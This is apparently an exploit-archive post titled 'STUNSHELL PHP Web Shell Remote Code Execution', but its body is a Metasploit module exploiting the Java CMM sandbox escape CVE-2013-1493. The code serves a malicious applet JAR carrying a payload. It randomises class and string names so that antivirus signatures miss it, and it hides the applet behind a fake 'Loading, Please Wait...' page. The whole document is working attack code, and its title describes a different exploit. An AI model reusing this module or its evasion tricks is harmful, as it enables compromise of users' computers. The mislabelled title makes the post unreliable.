
STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # The precompiled exploit classes ship with the framework under data/exploits/cve-2013-1493
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Rename the applet entry class (same length, random letters) so the class
    # name is different on every run; the other helper class names stay fixed.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Build the applet JAR: payload classes plus the four exploit classes
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rewrite the "metasploit"/"Payload" strings in entry names and bytes
      # so static signatures on those strings do not match the JAR
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Landing page: regenerate the payload for this client, then serve the applet tag
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end